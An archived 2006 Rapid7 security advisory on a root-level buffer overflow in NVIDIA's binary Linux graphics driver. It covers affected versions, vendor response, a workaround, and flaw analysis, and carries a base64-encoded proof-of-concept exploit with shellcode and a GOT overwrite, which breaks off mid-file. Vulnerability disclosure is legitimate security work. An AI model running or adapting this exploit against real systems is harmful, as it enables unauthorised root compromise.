AOH :: HP Unsorted N :: B06-5265.HTM

NVIDIA Binary Graphics Driver For Linux - buffer overflow



Rapid7 Advisory R7-0025: Buffer Overflow in NVIDIA Binary Graphics Driver For Linux
Rapid7 Advisory R7-0025: Buffer Overflow in NVIDIA Binary Graphics Driver For Linux



--=_mixed 006A029388257209_Content-Type: text/plain; charset="US-ASCII"

_______________________________________________________________________
                     Rapid7, LLC Security Advisory
Visit http://www.rapid7.com/ to download NeXpose, 
        SC Magazine Winner of Best Vulnerability Management product.
_______________________________________________________________________


Rapid7 Advisory R7-0025
Buffer Overflow in NVIDIA Binary Graphics Driver For Linux

   Published:  Oct 16, 2006
   Revision:   1.0
http://www.rapid7.com/advisories/R7-0025.jsp 

1. Affected system(s):

   KNOWN VULNERABLE:
    o NVIDIA Driver For Linux v8774
    o NVIDIA Driver For Linux v8762

   PROBABLY VULNERABLE:
    o NVIDIA Driver for FreeBSD
    o NVIDIA Driver for Solaris
    o Earlier versions

   KNOWN FIXED:
    o None

2. Summary

   The NVIDIA Binary Graphics Driver for Linux is vulnerable to a
   buffer overflow that allows an attacker to run arbitrary code as
   root. This bug can be exploited both locally or remotely (via
   a remote X client or an X client which visits a malicious web page).
   A working proof-of-concept root exploit is included with this
   advisory.

   The NVIDIA drivers for Solaris and FreeBSD are also likely to be
   vulnerable.

3. Vendor status and information

   NVIDIA Corporation
http://www.nvidia.com 

   There have been multiple public reports of this NVIDIA bug on the
   NVNews forum [1,2] and elsewhere, dating back to 2004 [3]. NVIDIA's
   first public acknowledgement of this bug was on July 7th, 2006. In a
   public posting [1] on the NVNews forum, an NVIDIA employee reported
   having reproduced the problem, assigned it bug ID 239065, and promised
   a fix would be forthcoming.

   As of the publication date, the latest NVIDIA binary driver is still
   vulnerable. Furthermore, it is our opinion that NVIDIA's binary driver
   remains an unacceptable security risk based on the large numbers of
   reproducible, unfixed crashes that have been reported in public forums
   and bug databases. This number does not include bugs reported directly
   to NVIDIA.

1. http://www.nvnews.net/vbulletin/showthread.php?p=931048 (Jul 2006) 
2. http://www.nvnews.net/vbulletin/showthread.php?t=76493 (Sep 2006) 
   3. https://bugs.freedesktop.org/show_bug.cgi?id=2129         (Dec 2004)
4. http://lists.freedesktop.org/archives/xorg/2005-January/005642.html 
5. http://forums.gentoo.org/viewtopic.php?t=282107 (Jan 2005) 
   6. https://bugs.eclipse.org/bugs/show_bug.cgi?id=87299       (Mar 2005)
7. http://www.nvnews.net/vbulletin/showthread.php?t=76206 (Sep 2006) 

4. Solution

   Disable the binary blob driver and use the open-source "nv" driver
   that is included by default with X.

5. Detailed analysis

   There are two NVIDIA graphics drivers for Linux: a closed-source
   binary blob driver provided by NVIDIA (which provides acceleration)
   and an open-source driver (which lacks acceleration). NVIDIA's
   binary blob driver contains an error in its accelerated rendering
   of glyphs (text character data) that can be exploited to write
   arbitrary data to anywhere in memory. The open-source driver is
   not vulnerable.

   The XRender extension provides a client function named
   XRenderCompositeString8 which tells the X server to render glyphs
   onto the screen. This request is processed by the server's
   ProcRenderCompositeGlpyhs function. This function pulls the glyphs
   out of the render request, constructs a glyph list, and then calls
   into the graphics driver via a registered callback function.

   The NVIDIA binary blob driver registers a function named _nv000373X.
   This function calculates a bounding BoxRec of the total area occupied
   by the glyph data. It then uses Xalloc to allocate a buffer large
   enough to hold the data by multiplying width * height. This buffer
   is then passed to another internal function called _nv000053X.

   The _nv000053X function iterates over the glyph list and copies
   glyph data into the buffer using each glyph's accumulated width,
   xOff, height, and yOff values to calculate the destination position
   in the buffer. The NVIDIA binary blob driver does not check this
   calculation against the size of the allocated buffer. As a result,
   a short sequence of user-supplied glyphs can be used to trick the
   function into writing to an arbitrary location in memory.

   It is important to note that glyph data is supplied to the X server
   by the X client. Any remote X client can gain root privileges on
   the X server using the proof of concept program attached.

   It is also trivial to exploit this vulnerability as a DoS by causing
   an existing X client program (such as Firefox) to render a long text
   string. It may be possible to use Flash movies, Java applets, or
   embedded web fonts to supply the custom glyph data necessary for
   reliable remote code execution.

   A simple HTML page containing an INPUT field with a long value is
   sufficient to demonstrate the DoS.

5. Credit

   This vulnerability was discovered by Derek Abdine of Rapid7. Special
   thanks to Marc Bevand for his assistance.

6. Contact Information

   Rapid7, LLC
Email: advisory@rapid7.com 
Web: http://www.rapid7.com 
   Phone: +1 (310) 316-1235

7. Disclaimer and Copyright

   Rapid7, LLC is not responsible for the misuse of the information
   provided in our security advisories. These advisories are a service
   to the professional security community. There are NO WARRANTIES with
   regard to this information. Any application or distribution of this
   information constitutes acceptance AS IS, at the user's own risk.
   This information is subject to change without notice.

   This advisory Copyright (C) 2006 Rapid7, LLC. Permission is hereby
   granted to redistribute this advisory, providing that no changes are
   made and that the copyright notices and disclaimers remain intact.

--=_mixed 006A029388257209_Content-Type: application/octet-stream; name="nv_exploit.c"
Content-Disposition: attachment; filename="nv_exploit.c"
Content-Transfer-Encoding: base64

LyoKICogQ29weXJpZ2h0IChjKSAyMDA1IE1hdHRoaWV1IEhlcnJiCiAqIENvcHlyaWdodCAoYykg
MjAwNiBEZXJlayBBYmRpbmUsIE1hcmMgQmV2YW5kCiAqCiAqIFBlcm1pc3Npb24gdG8gdXNlLCBj
b3B5LCBtb2RpZnksIGFuZCBkaXN0cmlidXRlIHRoaXMgc29mdHdhcmUgZm9yIGFueQogKiBwdXJw
b3NlIHdpdGggb3Igd2l0aG91dCBmZWUgaXMgaGVyZWJ5IGdyYW50ZWQsIHByb3ZpZGVkIHRoYXQg
dGhlIGFib3ZlCiAqIGNvcHlyaWdodCBub3RpY2UgYW5kIHRoaXMgcGVybWlzc2lvbiBub3RpY2Ug
YXBwZWFyIGluIGFsbCBjb3BpZXMuCiAqCiAqIFRIRSBTT0ZUV0FSRSBJUyBQUk9WSURFRCAiQVMg
SVMiIEFORCBUSEUgQVVUSE9SIERJU0NMQUlNUyBBTEwgV0FSUkFOVElFUwogKiBXSVRIIFJFR0FS
RCBUTyBUSElTIFNPRlRXQVJFIElOQ0xVRElORyBBTEwgSU1QTElFRCBXQVJSQU5USUVTIE9GCiAq
IE1FUkNIQU5UQUJJTElUWSBBTkQgRklUTkVTUy4gSU4gTk8gRVZFTlQgU0hBTEwgVEhFIEFVVEhP
UiBCRSBMSUFCTEUgRk9SCiAqIEFOWSBTUEVDSUFMLCBESVJFQ1QsIElORElSRUNULCBPUiBDT05T
RVFVRU5USUFMIERBTUFHRVMgT1IgQU5ZIERBTUFHRVMKICogV0hBVFNPRVZFUiBSRVNVTFRJTkcg
RlJPTSBMT1NTIE9GIFVTRSwgREFUQSBPUiBQUk9GSVRTLCBXSEVUSEVSIElOIEFOCiAqIEFDVElP
TiBPRiBDT05UUkFDVCwgTkVHTElHRU5DRSBPUiBPVEhFUiBUT1JUSU9VUyBBQ1RJT04sIEFSSVNJ
TkcgT1VUIE9GCiAqIE9SIElOIENPTk5FQ1RJT04gV0lUSCBUSEUgVVNFIE9SIFBFUkZPUk1BTkNF
IE9GIFRISVMgU09GVFdBUkUuDQogKg0KICogRXhwbG9pdCBmb3IgQnVmZmVyIE92ZXJmbG93IGlu
IE5WSURJQSBCaW5hcnkgR3JhcGhpY3MgRHJpdmVyIEZvciBMaW51eA0KICogc2VlIGh0dHA6Ly93
d3cucmFwaWQ3LmNvbS9hZHZpc29yaWVzL1I3LTAwMjUuanNwIGZvciBvcmlnaW5hbCBhZHZpc29y
eS4KICovCiNpbmNsdWRlIDxzaWduYWwuaD4KI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxz
dGRsaWIuaD4KCiNpbmNsdWRlIDxYMTEvSW50cmluc2ljLmg+CiNpbmNsdWRlIDxYMTEvWGZ0L1hm
dC5oPgoKaW50IGRvbmUgPSAwOwp1bnNpZ25lZCBsb25nIGJsYWNrX3BpeGVsOwoKLyogVGhpcyBl
eHBsb2l0IHRha2VzIHR3byBhcmd1bWVudHM6CiAqICAgIG8gVGhlIGxvd2VzdCBhZGRyZXNzIHBh
c3QgWCdzIGhlYXAuCiAqICAgIG8gWCdzIGRhdGEgYWRkcmVzcy4KICoKICogICAgTm90ZSB0aGUg
Zmlyc3QgYWRkcmVzcyByZXF1aXJlZCBpcyB1c3VhbGx5CiAqICAgIGluIHRoZSAweGJYWFhYWFhY
IHJhbmdlLCBhcyB0aGUgZXhwbG9pdAogKiAgICBmb3JjZXMgdGhlIG52aWRpYSBkcml2ZXIgdG8g
YWxsb2NhdGUgYSBsYXJnZQogKiAgICBzdW0gb2YgbWVtb3J5LgogKgogKiAgICBUaGlzIGluZm9y
bWF0aW9uIGNhbiBiZSBlYXNpbHkgdGFrZW4gdXNpbmc6CiAqICAgIGNhdCAvcHJvYy9gcGdyZXAg
WG9yZ2AvbWFwcyB8IGhlYWQgLW4gNQogKgogKiAgICBPbiBhIHNhbXBsZSBzeXN0ZW0sIHRoaXMg
d2FzOgogKgogKiAgICAwODA0ODAwMC0wODFiODAwMCByLXhwIDAwMDAwMDAwIDA5OjAyIDU4NzIx
MjAyICAgL3Vzci9iaW4vWG9yZwogKiAgICAwODFiODAwMC0wODFjNzAwMCBydy1wIDAwMTcwMDAw
IDA5OjAyIDU4NzIxMjAyICAgL3Vzci9iaW4vWG9yZwogKiAgICAwODFjNzAwMC0wODUzMzAwMCBy
dy1wIDA4MWM3MDAwIDAwOjAwIDAgICAgICAgICAgW2hlYXBdCiAqICAgIGI1YmJjMDAwLWI2MGJk
MDAwIHJ3LXMgZTM1ZjkwMDAgMDA6MGQgMTIxNTQgICAgICAvZGV2L252aWRpYTAKICogICAgYjYw
YmQwMDAtYjYxMTIwMDAgcnctcCBiNjBiZDAwMCAwMDowMCAwCiAqCiAqICAgIFRodXMsIG9uZSB3
b3VsZCB1c2U6CiAqCiAqICAgIC4vbnZfZXhwbG9pdCAweGI1YmJjMDAwIDB4MDgxYjgwMDAKICoK
ICogICAgVG8gcnVuIHRoZSBleHBsb2l0LiAgTm90ZSB0aGF0IGFsdGhvdWdoIHRoZSBleHBsb2l0
ICJiZXN0IGd1ZXNzZXMiCiAqICAgIHRoZSBjb3JyZWN0IHNwb3QgdG8gd3JpdGUgdGhlIHNoZWxs
Y29kZSwgaXQgbWF5IGJlIG9mZi4gIFRoaXMKICogICAgbWF5IGJlIHR3ZWFrZWQgYnkgbW9kaWZ5
aW5nIHRoZSAweDJDMDAwMCBpbiB0aGUgc291cmNlIGJlbG93LgogKiAgICBJZiB0aGUgZGF0YSBp
cyB3cml0dGVuIHRvIGFuIGluY29ycmVjdCBsb2NhdGlvbiB3aGVyZSB2aXRhbAogKiAgICBYIHBy
b2dyYW0gZGF0YSBpcyBzdG9yZWQsIFggd2lsbCAoZXZlbnR1YWxseSwgaWYgbm90IGltbWVkaWF0
ZWx5KQogKiAgICBjcmFzaC4KICoKICogICAgVGhlIGV4cGxvaXQgd29ya3MgYnkgb3ZlcndyaXRp
bmcgdGhlIGFkZHJlc3Mgb2YgZnJlZSgpIGluIHRoZQogKiAgICBHbG9iYWwgT2Zmc2V0IFRhYmxl
IHRvIGFuIGFkZHJlc3Mgb2Zmc2V0IHJlbGF0aXZlIHRvIHRoZSBzdXBwbGllZAogKiAgICBHT1Qg
IGFkZHJlc3MgKHNlY29uZCBhcmd1bWVudCkuICBUaGUgTlZJRElBIGRyaXZlciB3aWxsIHRoZW4g
Y2FsbAogKiAgICBYZnJlZSwgd2hpY2ggd2lsbCBpbiB0dXJuIGNhbGwgZnJlZSgpIHVzaW5nIHRo
ZSBvdmVyd3JpdHRlbiBHT1QKICogICAgZW50cnkgYW5kIG5vcCBzbGlkZSB0byB0aGUgc2hlbGxj
b2RlLgogKi8KCgovKiBUaGUgc2hlbGxjb2RlIGJlbG93IHdpbGwgZXhlY3V0ZSBhIHNoZWxsIHNj
cmlwdCBsb2NhdGVkCiAqIGF0IC90bXAvbnYuICovCnVuc2lnbmVkIGNoYXIgc2hlbGxjb2RlW10g
PQogICAiXHhiOFx4MDJceDAwXHgwMFx4MDBceGNkXHg4MFx4ODVceGMwXHg3NVx4ZmVceDMxXHhj
MFx4NjhceDJmXHg2ZSIKICAgIlx4NzZceDAwXHg2OFx4MmZceDc0XHg2ZFx4NzBceDg5XHhlM1x4
NTBceDUzXHg4OVx4ZTFceDMxXHhkMlx4YjgiCiAgICJceDBiXHgwMFx4MDBceDAwXHhjZFx4ODAi
OwoKdHlwZWRlZiBzdHJ1Y3QgIHsKICAgIERpc3BsYXkgKmRpc3BsYXk7CiAgICBYdEFwcENvbnRl
eHQgYXBwOwogICAgV2luZG93IHdpbjsKICAgIFhmdEZvbnQgKmZvbnQ7CiAgICBYZnRDb2xvciBj
b2xvciwgYmc7CiAgICBYZnREcmF3ICpkcmF3OwogICAgR0MgZ2M7Cn0gWERhdGFTdHI7CgpzdGF0
aWMgdm9pZApzaWdIYW5kbGVyKGludCBzaWcpCnsKICAgIGRvbmUgPSAxOwp9CgppbnQKY3JlYXRl
V2luKFhEYXRhU3RyICpkYXRhKQp7CiAgICB1X2xvbmcgYXR0cmlidXRlTWFzazsKICAgIFhTZXRX
aW5kb3dBdHRyaWJ1dGVzIGF0dHJpYnV0ZTsKICAgIFdpbmRvdyB3OwogICAgRGlzcGxheSAqZGlz
cGxheSA9IGRhdGEtPmRpc3BsYXk7CiAgICBpbnQgc2NyZWVuID0gRGVmYXVsdFNjcmVlbihkaXNw
bGF5KTsKICAgIFhHQ1ZhbHVlcyBnY192YWw7CiAgICBTY3JlZW4gKnM7CgogICAgYXR0cmlidXRl
LmJhY2tncm91bmRfcGl4ZWwgPSBXaGl0ZVBpeGVsKGRpc3BsYXksIHNjcmVlbik7CiAgICBhdHRy
aWJ1dGUuYm9yZGVyX3BpeGVsID0gV2hpdGVQaXhlbChkaXNwbGF5LCBzY3JlZW4pOwogICAgYXR0
cmlidXRlLmJpdF9ncmF2aXR5ID0gTm9ydGhXZXN0R3Jhdml0eTsKICAgIGF0dHJpYnV0ZS5ldmVu
dF9tYXNrID0gQnV0dG9uUHJlc3NNYXNrfEJ1dHRvblJlbGVhc2VNYXNrfEtleVByZXNzTWFza3wK
ICAgICAgICBFeHBvc3VyZU1hc2s7CgogICAgYXR0cmlidXRlTWFzayA9CiAgICAgICAgQ1dCb3Jk
ZXJQaXhlbCB8CiAgICAgICAgQ1dCYWNrUGl4ZWwgfAogICAgICAgIENXRXZlbnRNYXNrIHwKICAg
ICAgICBDV0JpdEdyYXZpdHk7CiAgICBzID0gU2NyZWVuT2ZEaXNwbGF5KGRhdGEtPmRpc3BsYXks
IHNjcmVlbik7CgogICAgdyA9IFhDcmVhdGVXaW5kb3coZGlzcGxheSwgUm9vdFdpbmRvdyhkaXNw
bGF5LCBzY3JlZW4pLCAwLCAwLAogICAgICAgICAgICBEaXNwbGF5V2lkdGgoZGlzcGxheSwgc2Ny
ZWVuKS8yLCAxNTAsCiAgICAgICAgICAgIDAsIERlZmF1bHREZXB0aChkaXNwbGF5LCBzY3JlZW4p
LCBJbnB1dE91dHB1dCwKICAgICAgICAgICAgRGVmYXVsdFZpc3VhbChkaXNwbGF5LCBzY3JlZW4p
LCBhdHRyaWJ1dGVNYXNrLCAmYXR0cmlidXRlKTsKCiAgICBkYXRhLT5mb250ID0gWGZ0Rm9udE9w
ZW4oZGlzcGxheSwgc2NyZWVuLAogICAgICAgICAgICBYRlRfRkFNSUxZLCBYZnRUeXBlU3RyaW5n
LCAibW9ubyIsCiAgICAgICAgICAgIFhGVF9TSVpFLCBYZnRUeXBlSW50ZWdlciwgMTYsCiAgICAg
ICAgICAgIE5VTEwpOwogICAgaWYgKCFYZnRDb2xvckFsbG9jTmFtZShkaXNwbGF5LCBYRGVmYXVs
dFZpc3VhbChkaXNwbGF5LCBzY3JlZW4pLAogICAgICAgICAgICAgICAgRGVmYXVsdENvbG9ybWFw
KGRpc3BsYXksIHNjcmVlbiksICJyZWQ0IiwgJmRhdGEtPmNvbG9yKSkgewogICAgICAgIGZwcmlu
dGYoc3RkZXJyLCAiY2Fubm90IGdldCBjb2xvciIpOwogICAgICAgIHJldHVybiAtMTsKICAgIH0K
ICAgIGlmICghWGZ0Q29sb3JBbGxvY05hbWUoZGlzcGxheSwgWERlZmF1bHRWaXN1YWwoZGlzcGxh
eSwgc2NyZWVuKSwKICAgICAgICAgICAgICAgIERlZmF1bHRDb2xvcm1hcChkaXNwbGF5LCBzY3Jl
ZW4pLCAibGluZW4iLCAmZGF0YS0+YmcpKSB7CiAgICAgICAgZnByaW50ZihzdGRlcnIsICJjYW5u
b3QgZ2V0IGJnIGNvbG9yIik7CiAgICAgICAgcmV0dXJuIC0xOwogICAgfQogICAgZGF0YS0+ZHJh
dyA9IFhmdERyYXdDcmVhdGUoZGlzcGxheSwgdywgRGVmYXVsdFZpc3VhbChkaXNwbGF5LCBzY3Jl
ZW4pLAogICAgICAgICAgICBEZWZhdWx0Q29sb3JtYXAoZGlzcGxheSwgc2NyZWVuKSk7CiAgICBn
Y192YWwuZm9yZWdyb3VuZCA9IEJsYWNrUGl4ZWwoZGlzcGxheSwgc2NyZWVuKTsKICAgIGdjX3Zh
bC5iYWNrZ3JvdW5kID0gV2hpdGVQaXhlbChkaXNwbGF5LCBzY3JlZW4pOwogICAgZGF0YS0+Z2Mg
PSBYQ3JlYXRlR0MgKGRpc3BsYXksIHcsIEdDRm9yZWdyb3VuZHxHQ0JhY2tncm91bmQsCiAgICAg
ICAgICAgICZnY192YWwpOwoKICAgIGRhdGEtPndpbiA9IHc7CiAgICByZXR1cm4gMDsKfQoKdm9p
ZApzaG93KFhEYXRhU3RyICpkYXRhKQp7CiAgICBTdGF0dXMgczsKCiAgICBYTWFwV2luZG93KGRh
dGEtPmRpc3BsYXksIGRhdGEtPndpbik7CiAgICBzID0gWEdyYWJLZXlib2FyZChkYXRhLT5kaXNw
bGF5LCBkYXRhLT53aW4sIEZhbHNlLAogICAgICAgICAgICBHcmFiTW9kZUFzeW5jLCBHcmFiTW9k
ZUFzeW5jLCBDdXJyZW50VGltZSk7CiAgICBpZiAocyAhPSBHcmFiU3VjY2VzcykgewogICAgICAg
IHByaW50ZigiRXJyb3IgZ3JhYmluZyBrYmQgJWRcbiIsIHMpOwogICAgfQp9CgppbnQKbWFpbihp
bnQgYXJnYywgY2hhciAqYXJndltdKQp7CiAgICBEaXNwbGF5ICpkaXNwbGF5OwogICAgV2lkZ2V0
IHRvcGxldmVsOwogICAgWHRBcHBDb250ZXh0IGFwcF9jb247CiAgICBYRXZlbnQgZXZlbnQ7CiAg
ICBjaGFyIGMsICpzdHJpbmc7CiAgICB1bnNpZ25lZCBpbnQgaTsKICAgIFhEYXRhU3RyICpkYXRh
OwogICAgWEV4cG9zZUV2ZW50ICpleHBvc2UgPSAoWEV4cG9zZUV2ZW50ICopJmV2ZW50OwogICAg
dW5zaWduZWQgaW50IGhlYXBhZGRyLCBnb3RhZGRyOwoKICAgIGlmIChhcmdjID4gMikKICAgIHsK
ICAgICAgICBoZWFwYWRkciA9IHN0cnRvdWwoYXJndlsxXSxOVUxMLDApOwogICAgICAgIGdvdGFk
ZHIgID0gc3RydG91bChhcmd2WzJdLE5VTEwsMCk7CiAgICB9CiAgICBlbHNlCiAgICB7CiAgICAg
ICAgcHJpbnRmKCJVc2FnZTogJXMgPEhFQVBBRERSPiA8R09UQUREUj5cblxuIiwgYXJndlswXSk7
CiAgICAgICAgcmV0dXJuIDA7CiAgICB9CgogICAgdG9wbGV2ZWwgPSBYdEFwcEluaXRpYWxpemUo
JmFwcF9jb24sICJYU2FmZSIsIE5VTEwsIDAsCiAgICAgICAgICAgICZhcmdjLCBhcmd2LCBOVUxM
LCBOVUxMLCAwKTsKICAgIGRpc3BsYXkgPSBYdERpc3BsYXkodG9wbGV2ZWwpOwoKICAgIGRhdGEg
PSAoWERhdGFTdHIgKiltYWxsb2Moc2l6ZW9mKFhEYXRhU3RyKSk7CiAgICBpZiAoZGF0YSA9PSBO
VUxMKSB7CiAgICAgICAgcGVycm9yKCJtYWxsb2MiKTsKICAgICAgICBleGl0KEVYSVRfRkFJTFVS
RSk7CiAgICB9CgogICAgZGF0YS0+ZGlzcGxheSA9IGRpc3BsYXk7CiAgICBkYXRhLT5hcHAgPSBh
cHBfY29uOwoKICAgIGlmIChjcmVhdGVXaW4oZGF0YSkgPCAwKSB7CiAgICAgICAgZnByaW50Zihz
dGRlcnIsICJjYW4ndCBjcmVhdGUgRGF0YSBXaW5kb3ciKTsKICAgICAgICBleGl0KEVYSVRfRkFJ
TFVSRSk7CiAgICB9CiAgICBzaG93KGRhdGEpOwoKICAgIHNpZ25hbChTSUdJTlQsIHNpZ0hhbmRs
ZXIpOwogICAgc2lnbmFsKFNJR0hVUCwgc2lnSGFuZGxlcik7CiAgICBzaWduYWwoU0lHUVVJVCwg
c2lnSGFuZGxlcik7CiAgICBzaWduYWwoU0lHVEVSTSwgc2lnSGFuZGxlcik7CgogICAgLyoqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKgogICAgICogQkVHSU4gRk9OVCBIRUFQIE9WRVJGTE9XIFNFVFVQIENPREUKICAg
ICAqCiAgICAgKiAiSXQncyBzbyBoYXJkIHRvIHdyaXRlIGEgZ3JhcGhpY3MgZHJpdmVyIHRoYXQg
b3Blbi1zb3VyY2luZyBpdCB3b3VsZAogICAgICogIG5vdCBoZWxwLiIKICAgICAqICAgIC0gQW5k
cmV3IEZlYXIsIFNvZnR3YXJlIFByb2R1Y3QgTWFuYWdlciAoTlZJRElBIENvcnBvcmF0aW9uKS4K
ICAgICAqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqLwogICAgWEdseXBoSW5mbyAqIGdseXBoczsKICAgIFhSZW5kZXJQ
aWN0Rm9ybWF0IGZtdDsKICAgIFhSZW5kZXJQaWN0Rm9ybWF0ICptYXNrID0gMDsKICAgIEdseXBo
U2V0IGdzZXQ7CiAgICBjaGFyICogYnVmID0wOwogICAgaW50IG9mZnNldCwgY3IsIG51bUI7CiAg
ICBpbnQgeHNjcmVlbnBvcyAgPSAzMjY4MDsKICAgIGludCBtYWdpY19sZW4gICA9IDMyNzY4IC0g
eHNjcmVlbnBvczsKICAgIGludCB3cl9hZGRyX2xlbiA9IDM1NDg7CiAgICBpbnQgd3Jfbm9wX2xl
biAgPSAyMDA7CgogICAgLyogQ2FsY3VsYXRlIHRoZSBvZmZzZXQgdG8gdGhlIEdsb2JhbCBPZmZz
ZXQgVGFibGUuCiAgICAgKiAweDJDMDAwMCBpcyB0aGUgc2l6ZSBvZiB0aGUgYnVmZmVyIHRoZSBO
VklESUEgZHJpdmVyCiAgICAgKiBhbGxvY2F0ZXMgZm9yIHVzIHdoZW4gaXQgaXMgYWJvdXQgdG8g
ZHJhdy4KICAgICAqLwogICAgb2Zmc2V0ID0gZ290YWRkci0oaGVhcGFkZHItMHgyQzAwMDApOwog
ICAgb2Zmc2V0ICs9IG1hZ2ljX2xlbjsKICAgIGdseXBocyA9IG1hbGxvYyhzaXplb2YoWEdseXBo
SW5mbykqMyk7CgogICAgLyogUGF5bG9hZCBnbHlwaCAqLwogICAgZ2x5cGhzWzBdLndpZHRoID0g
MHg0MDAwOyAvKiBPbmUgY29udGlndW91cyBidWZmZXIgb2YgMTZLLi4uIHdheSBtb3JlIHRoYW4g
bmVjZXNzYXJ5ICovCiAgICBnbHlwaHNbMF0uaGVpZ2h0ID0gMTsKICAgIGdseXBoc1swXS55T2Zm
ID0gMDsKICAgIGdseXBoc1swXS54T2ZmID0gZ2x5cGhzWzBdLndpZHRoOwogICAgZ2x5cGhzWzBd
LnggPSAwOwogICAgZ2x5cGhzWzBdLnkgPSAwOwoKICAgIC8qIExhcmdlIG9mZnNldCBnbHlwaCAo
dW50d2Vha2VkKSAqLwogICAgZ2x5cGhzWzFdLndpZHRoPTA7CiAgICBnbHlwaHNbMV0uaGVpZ2h0
PTA7CiAgICBnbHlwaHNbMV0ueU9mZj0zMjc2NzsKICAgIGdseXBoc1sxXS54T2ZmPTA7CiAgICBn
bHlwaHNbMV0ueCA9IDA7CiAgICBnbHlwaHNbMV0ueSA9IDA7CgogICAgLyogU21hbGwgb2Zmc2V0
IGdseXBoICh0d2Vha2VkKSAqLwogICAgZ2x5cGhzWzJdLndpZHRoPTA7CiAgICBnbHlwaHNbMl0u
aGVpZ2h0PTA7CiAgICBnbHlwaHNbMl0ueU9mZj0wOwogICAgZ2x5cGhzWzJdLnhPZmY9MDsKICAg
IGdseXBoc1syXS54ID0gMDsKICAgIGdseXBoc1syXS55ID0gMDsKCiAgICBmbXQudHlwZSA9IFBp
Y3RUeXBlRGlyZWN0OwogICAgZm10LmRlcHRoID0gODsKCiAgICBHbHlwaCAqIHhnbHlwaGlkcyA9
IG1hbGxvYygzKnNpemVvZihHbHlwaCkpOwoKICAgIHhnbHlwaGlkc1swXSA9ICdBJzsKICAgIHhn
bHlwaGlkc1sxXSA9ICdCJzsKICAgIHhnbHlwaGlkc1syXSA9ICdDJzsKCiAgICBpbnQgc3RyaWRl
ID0gKChnbHlwaHNbMF0ud2lkdGgqMSkrMykmfjM7IC8qIE5lZWRzIHRvIGJlIERXT1JEIGFsaWdu
ZWQgKi8KICAgIGludCBidWZzaXplID0gc3RyaWRlKmdseXBoc1swXS5oZWlnaHQ7CiAgICBidWYg
PSBtYWxsb2MoYnVmc2l6ZSk7CgogICAgLyogV3JpdGUganVtcCBhZGRyZXNzIHRvIHRoZSBidWZm
ZXIgYSBudW1iZXIgb2YgdGltZXMgKi8KICAgIGZvciAoY3I9MDsgY3I8d3JfYWRkcl9sZW47IGNy
Kz00KQogICAgewogICAgICAgKigodW5zaWduZWQgaW50KikoKHVuc2lnbmVkIGNoYXIqKWJ1ZiAr
IGNyKSkgPSBnb3RhZGRyK3dyX2FkZHJfbGVuKzQ7CiAgICB9CgogICAgLyogV3JpdGUgdGhlIE5P
UCBpbnN0cnVjdGlvbnMgdW50aWwgd3Jfbm9wX2xlbiAqLwogICAgbWVtc2V0KGJ1Zit3cl9hZGRy
X2xlbiwgMHg5MCAvKiBOT1AgKi8sIHdyX25vcF9sZW4pOwoKICAgIC8qIFdyaXRlIHRoZSBzaGVs
bGNvZGUgKi8KICAgIGNyKz13cl9ub3BfbGVuOwogICAgbWVtY3B5KGJ1Zitjciwgc2hlbGxjb2Rl
LCBzaXplb2Yoc2hlbGxjb2RlKSk7CgogICAgLyogQ2FsY3VsYXRlIHRoZSBudW1iZXIgb2YgQidz
IHJlcXVpcmVkIHRvIHNlbmQgKi8KICAgIG51bUIgPSBvZmZzZXQgLyAoZ2x5cGhzWzFdLnlPZmYg
KiBtYWdpY19sZW4pOwoKICAgIC8qIFdlIHNlbmQgb25seSBvbmUgQywgYnV0IHdlIGNoYW5nZSBp
dHMgeU9mZiB2YWx1ZSBhY2NvcmRpbmcgdG8KICAgICAqIGhvdyBtdWNoIHNwYWNlIHdlIGhhdmUg
bGVmdCBiZWZvcmUgd2UgbWVldCB0aGUgY29ycmVjdCBpbmRleCBsZW5ndGggKi8KICAgIGdseXBo
c1syXS55T2ZmID0gKG9mZnNldCAtIChudW1CICogZ2x5cGhzWzFdLnlPZmYgKiBtYWdpY19sZW4p
KSAvIChtYWdpY19sZW4pOwoKICAgIC8qIE5vdyBjcmVhdGUgYSBuZXcgYnVmZmVyIGZvciB0aGUg
c3RyaW5nIGRhdGEgKi8KICAgIHN0cmluZyA9IG1hbGxvYyhudW1CKzEvKm51bUMqLysxLypudW1B
Ki8rMS8qTlVMTCovKTsKICAgIGZvciAoY3I9MDsgY3I8bnVtQjsgY3IrKykgICBzdHJpbmdbY3Jd
ID0gJ0InOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN0cmluZ1tjcl0gPSAnQyc7
IGNyKys7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3RyaW5nW2NyXSA9ICdBJzsg
Y3IrKzsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzdHJpbmdbY3JdID0gIDA7Cgog
ICAgbWFzayA9IFhSZW5kZXJGaW5kRm9ybWF0KGRpc3BsYXksIFBpY3RGb3JtYXRUeXBlfFBpY3RG
b3JtYXREZXB0aCwgJmZtdCwgMCk7CiAgICBnc2V0ID0gWFJlbmRlckNyZWF0ZUdseXBoU2V0KGRp
c3BsYXksIG1hc2spOwoKICAgIGlmIChtYXNrKQogICAgewogICAgICAgIC8qIEFzayB0aGUgc2Vy
dmVyIHRvIHRpZSB0aGUgZ2x5cGhzIHRvIHRoZSBnbHlwaHNldCB3ZSBjcmVhdGVkLAogICAgICAg
ICAqIHdpdGggb3VyIGFkZHIvbm9wc2xpZGUvc2hlbGxjb2RlIGJ1ZmZlciBhcyB0aGUgYWxwaGEg
ZGF0YS4KICAgICAgICAgKi8KICAgICAgICBYUmVuZGVyQWRkR2x5cGhzKGRpc3BsYXksIGdzZXQs
IHhnbHlwaGlkcywgZ2x5cGhzLCAzLCBidWYsIGJ1ZnNpemUpOwogICAgfQogICAgLyogRU5EIEZP
TlQgSEVBUCBPVkVSRkxPVyBTRVRVUCBDT0RFICovCgogICAgZG9uZSA9IDA7CiAgICB3aGlsZSAo
IWRvbmUpIHsKICAgICAgICBYTmV4dEV2ZW50KGRpc3BsYXksICZldmVudCk7CiAgICAgICAgc3dp
dGNoKGV2ZW50LnR5cGUpIHsKICAgICAgICAgICAgY2FzZSBLZXlQcmVzczoKICAgICAgICAgICAg
ICAgIGkgPSBYTG9va3VwU3RyaW5nKCZldmVudC54a2V5LCAmYywgMSwgTlVMTCwgTlVMTCk7CiAg
